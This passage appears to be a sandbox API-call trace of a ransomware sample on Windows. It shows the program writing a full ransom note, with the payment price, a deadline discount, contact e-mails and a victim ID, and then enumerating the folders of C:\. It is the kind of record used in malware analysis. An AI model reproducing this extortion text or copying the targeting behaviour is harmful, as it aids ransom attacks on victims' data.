(HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdd34390 [0127.784] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dc0a0 | out: hHeap=0x4970000) returned 1 [0127.784] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db7d8 | out: hHeap=0x4970000) returned 1 [0127.784] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned 1116 [0127.784] WriteFile (in: hFile=0x5c4, lpBuffer=0xdd34390*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0xe00fb64, lpOverlapped=0x0 | out: lpBuffer=0xdd34390*, lpNumberOfBytesWritten=0xe00fb64*=0x45c, lpOverlapped=0x0) returned 1 [0127.785] CloseHandle (hObject=0x5c4) returned 1 [0127.786] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd34390 | out: hHeap=0x4970000) returned 1 [0127.786] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.786] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0127.786] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.786] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x49a4880 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8328 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c37b8 [0127.787] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8328 | out: hHeap=0x4970000) returned 1 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8328 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3320 [0127.787] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.787] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c37b8 | out: hHeap=0x4970000) returned 1 [0127.787] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x38) returned 0xdce3a70 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c37b8 [0127.787] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3320 | out: hHeap=0x4970000) returned 1 [0127.787] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8328 | out: hHeap=0x4970000) returned 1 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8328 [0127.787] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.787] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.787] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0127.787] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0127.787] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x54) returned 0xdd08cc8 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3320 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9750 [0127.787] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c37b8 | out: hHeap=0x4970000) returned 1 [0127.787] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8328 | out: hHeap=0x4970000) returned 1 [0127.787] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce3a70 | out: hHeap=0x4970000) returned 1 [0127.787] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8328 [0127.787] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.788] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.788] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5898 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5808 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2b90 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c37b8 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.788] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3320 | out: hHeap=0x4970000) returned 1 [0127.788] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9750 | out: hHeap=0x4970000) returned 1 [0127.788] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8328 | out: hHeap=0x4970000) returned 1 [0127.788] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5850 [0127.788] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5808 | out: hHeap=0x4970000) returned 1 [0127.788] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5898 | out: hHeap=0x4970000) returned 1 [0127.788] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0127.788] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8328 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9750 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa8) returned 0x74bf8f0 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3320 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97f0 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce93e0 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5898 [0127.788] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c37b8 | out: hHeap=0x4970000) returned 1 [0127.788] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.788] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.788] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5850 | out: hHeap=0x4970000) returned 1 [0127.788] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2b90 | out: hHeap=0x4970000) returned 1 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.788] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9750 | out: hHeap=0x4970000) returned 1 [0127.788] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8328 | out: hHeap=0x4970000) returned 1 [0127.788] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0127.788] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8328 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9750 [0127.788] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9750 | out: hHeap=0x4970000) returned 1 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8328 | out: hHeap=0x4970000) returned 1 [0127.789] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe68136e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe68136e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c37b8 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xfc) returned 0xdd24260 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3400 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8328 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9750 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5850 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3320 | out: hHeap=0x4970000) returned 1 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97f0 | out: hHeap=0x4970000) returned 1 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce93e0 | out: hHeap=0x4970000) returned 1 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5898 | out: hHeap=0x4970000) returned 1 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3320 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c37b8 | out: hHeap=0x4970000) returned 1 [0127.789] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c37b8 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3240 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c37b8 | out: hHeap=0x4970000) returned 1 [0127.789] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe34b43a0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe34b43a0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce93e0 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.789] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.789] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.789] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x16c) returned 0x74f4b10 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c37b8 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97f0 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce90e8 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5898 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce98e0 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3390 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8490 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3400 | out: hHeap=0x4970000) returned 1 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8328 | out: hHeap=0x4970000) returned 1 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9750 | out: hHeap=0x4970000) returned 1 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5850 | out: hHeap=0x4970000) returned 1 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9688 | out: hHeap=0x4970000) returned 1 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3320 | out: hHeap=0x4970000) returned 1 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3240 | out: hHeap=0x4970000) returned 1 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce93e0 | out: hHeap=0x4970000) returned 1 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce93e0 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.790] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5850 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5808 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5808 | out: hHeap=0x4970000) returned 1 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5850 | out: hHeap=0x4970000) returned 1 [0127.790] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdcc90120, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xdcc90120, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xdcc90120, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9688 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.790] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.790] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0127.790] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.791] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.791] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x214) returned 0xdce0a50 [0127.791] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 